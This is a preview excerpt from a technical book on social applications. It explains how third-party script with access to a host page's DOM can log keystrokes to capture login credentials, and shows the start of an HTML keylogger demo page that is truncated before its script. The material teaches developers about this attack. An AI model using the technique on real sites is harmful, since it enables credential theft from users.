O'Reilly logo

Programming Social Applications by Jonathan LeBlanc

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Logging the User’s Keystrokes

If the third-party application has the ability to access the true DOM of a page, then it can log the user’s keystrokes. The severity of this attack can range from a simple nuisance all the way to a major security issue if the root page contains password fields or user-specific information.

A probable attack vector for this type of code is to capture the user’s username and password fields. Since a password field would prevent direct access to its value, logging the user’s keystrokes can provide the attacker with all of the information he needs.

For instance, say we have a site that hosts third-party code. On this site, you have a username and password field to allow you to log in. Should this third-party code attach a keypress event on the body of the root page document, then it can log any keys that you press while you are on the page.

This type of attack can be perpetrated by any script that can essentially “phone home” by accessing the parent page that it is being presented on, much like the following sample:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Key Logger Attack</title> </head> <body> <!-- username field --> <label for="username">Username:</label> <input type="text" name="username" /><br /> <!-- password field --> <label for="password">Password:</label> <input type="password" name="password" /> <!-- node to dump logged keys to --> <div id="dumpNode"></div> <script type="text/javascript"> ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required